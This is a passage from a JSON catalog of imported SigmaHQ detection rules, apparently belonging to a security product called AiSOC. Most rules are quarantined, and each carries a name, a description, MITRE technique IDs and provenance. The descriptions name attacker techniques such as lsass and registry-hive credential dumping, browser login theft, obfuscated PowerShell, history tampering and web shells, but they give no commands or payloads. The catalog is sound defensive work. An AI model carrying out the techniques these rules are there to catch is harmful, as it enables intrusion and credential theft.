Which is an interface that is not used by standard executables.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/function-call-from-undocumented-com-interface-editionupgrademanager.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb3722e4-1a06-46b6-b772-253e2e7db933", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml" } }, { "id": "sigmahq-sigma-fb4e2211-6d08-426b-8e6f-0d4a161e3b1d", "type": "detection", "name": "Clfs.SYS Loaded By Process Located In a Potential Suspicious Location", "description": "Detects Clfs.sys being loaded by a process running from a potentially suspicious location. 
Clfs.sys is loaded as part of many CVE exploits that target Common Log File.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clfs-sys-loaded-by-process-located-in-a-potential-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb4e2211-6d08-426b-8e6f-0d4a161e3b1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_clfs_load.yml" } }, { "id": "sigmahq-sigma-fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "type": "detection", "name": "Disabled IE Security Features", "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-ie-security-features.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml" } }, { 
"id": "sigmahq-sigma-fb656378-f909-47c1-8747-278bf09f4f4f", "type": "detection", "name": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-attempt-via-powershell-remote-thread.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb656378-f909-47c1-8747-278bf09f4f4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml" } }, { "id": "sigmahq-sigma-fb843269-508c-4b76-8b8d-88679db22ce7", "type": "detection", "name": "Suspicious Execution of Powershell with Base64", "description": "Commandline to launch powershell with a base64 payload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-powershell-with-base64.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb843269-508c-4b76-8b8d-88679db22ce7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_encode.yml" } }, { "id": "sigmahq-sigma-fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", "type": "detection", "name": "Execution of Powershell Script in Public Folder", "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-of-powershell-script-in-public-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" } }, { "id": "sigmahq-sigma-fbc5e92f-3044-4e73-a5c6-1c4359b539de", "type": "detection", "name": "PowerShell Script With File Hostname Resolving Capabilities", "description": "Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-with-file-hostname-resolving-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fbc5e92f-3044-4e73-a5c6-1c4359b539de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml" } }, { "id": "sigmahq-sigma-fbd7c32d-db2a-4418-b92c-566eb8911133", "type": "detection", "name": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syncappvpublishingserver-execute-arbitrary-powershell-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fbd7c32d-db2a-4418-b92c-566eb8911133", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" } }, { "id": "sigmahq-sigma-fc014922-5def-4da9-a0fc-28c973f41bfb", "type": "detection", "name": "Execution DLL of Choice Using WAB.EXE", "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-dll-of-choice-using-wab-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" } }, { "id": "sigmahq-sigma-fc028194-969d-4122-8abe-0470d5b8f12f", "type": "detection", "name": "Access to Browser Login Data", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-browser-login-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc028194-969d-4122-8abe-0470d5b8f12f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" } }, { "id": "sigmahq-sigma-fc0e89b5-adb0-43c1-b749-c12a10ec37de", "type": "detection", "name": "SafeBoot Registry Key Deleted Via Reg.EXE", "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/safeboot-registry-key-deleted-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" } }, { "id": "sigmahq-sigma-fc4f4817-0c53-4683-a4ee-b17a64bc1039", "type": "detection", "name": "Suspicious Desktopimgdownldr Target File", "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-desktopimgdownldr-target-file.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" } }, { "id": "sigmahq-sigma-fca949cc-79ca-446e-8064-01aa7e52ece5", "type": "detection", "name": "HackTool - PCHunter Execution", "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1057", "T1012", "T1083", "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-pchunter-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fca949cc-79ca-446e-8064-01aa7e52ece5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml" } }, { "id": "sigmahq-sigma-fcc6d700-68d9-4241-9a1a-06874d621b06", "type": "detection", "name": "Suspicious File Created Via OneNote Application", "description": "Detects suspicious files created via the OneNote application. 
This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-via-onenote-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml" } }, { "id": "sigmahq-sigma-fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "type": "detection", "name": ".RDP File Created By Uncommon Application", "description": "Detects creation of a file with an \".rdp\" extension by an application that doesn't commonly create such files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-file-created-by-uncommon-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml" } }, { "id": "sigmahq-sigma-fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "type": "detection", "name": "Disabled Windows Defender Eventlog", "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-windows-defender-eventlog.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" } }, { "id": "sigmahq-sigma-fcdf69e5-a3d3-452a-9724-26f2308bf2b1", "type": "detection", "name": "Phishing Pattern ISO in Archive", "description": "Detects cases in which an ISO file is opened within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/phishing-pattern-iso-in-archive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml" } }, { "id": "sigmahq-sigma-fd0f5778-d3cb-4c9a-9695-66759d04702a", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" } }, { "id": "sigmahq-sigma-fd435618-981e-4a7c-81f8-f78ce480d616", "type": "detection", "name": "Django Framework Exceptions", "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, 
"source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/django-framework-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fd435618-981e-4a7c-81f8-f78ce480d616", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/django/appframework_django_exceptions.yml" } }, { "id": "sigmahq-sigma-fd877b94-9bb5-4191-bb25-d79cbd93c167", "type": "detection", "name": "Dumping of Sensitive Hives Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumping-of-sensitive-hives-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml" } }, { "id": "sigmahq-sigma-fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "type": "detection", "name": "PowerShell Base64 Encoded FromBase64String Cmdlet", "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140", 
"T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-frombase64string-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml" } }, { "id": "sigmahq-sigma-fdbf0b9d-0182-4c43-893b-a1eaab92d085", "type": "detection", "name": "Potential Persistence Via Custom Protocol Handler", "description": "Detects potential persistence activity via the registration of new custom protocol handlers. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-custom-protocol-handler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml" } }, { "id": "sigmahq-sigma-fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "type": "detection", "name": "Linux Command History Tampering", "description": "Detects commands that try to clear or tamper with the Linux command history.\nThis technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as \"bash_history\" or \"zsh_history\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-command-history-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_clear_cmd_history.yml" } }, { "id": "sigmahq-sigma-fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "type": "detection", "name": "Exploit Framework User Agent", "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exploit-framework-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_frameworks.yml" } }, { "id": "sigmahq-sigma-fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "type": "detection", "name": "Network Connection Initiated To Mega.nz", "description": "Detects a network connection initiated by a binary to \"api.mega.co.nz\".\nAttackers were seen abusing file sharing websites similar to \"mega.nz\" in order to upload/download additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-mega-nz.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_mega_nz.yml" } }, { "id": "sigmahq-sigma-fdf135a2-9241-4f96-a114-bb404948f736", "type": "detection", "name": "Antivirus Web Shell Detection", "description": "Detects a highly relevant antivirus alert that reports a web shell.\nIt is highly recommended to tune this rule to the specific signature names used by your antivirus solution, e.g. by downloading a large web shell repository from GitHub and checking which alerts it produces.\nThis event must not be ignored just because the AV blocked the malware: investigate how the web shell got onto the host in the first place, since a web shell on disk usually means the hosting web application or its credentials were already compromised.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-web-shell-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdf135a2-9241-4f96-a114-bb404948f736", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_webshell.yml" } }, { "id": "sigmahq-sigma-fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "type": "detection", "name": "PsExec Service Execution", "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml" } }, { "id": "sigmahq-sigma-fe10751f-1995-40a5-aaa2-c97ccb4123fe", "type": "detection", "name": "Linux Capabilities Discovery", "description": "Detects attempts to discover files that have the setuid/setgid capability set on them. Such files could allow an adversary to escalate their privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-capabilities-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_capabilities_discovery.yml" } }, { "id": "sigmahq-sigma-fe20dda1-6f37-4379-bbe0-a98d400cae90", "type": "detection", "name": "Potential Persistence Via Scrobj.dll COM Hijacking", "description": "Detect use of scrobj.dll as this DLL looks for the 
ScriptletURL key to get the location of the script to execute", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-scrobj-dll-com-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml" } }, { "id": "sigmahq-sigma-fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "type": "detection", "name": "Suspicious Scripting in a WMI Consumer", "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scripting-in-a-wmi-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" } }, { "id": 
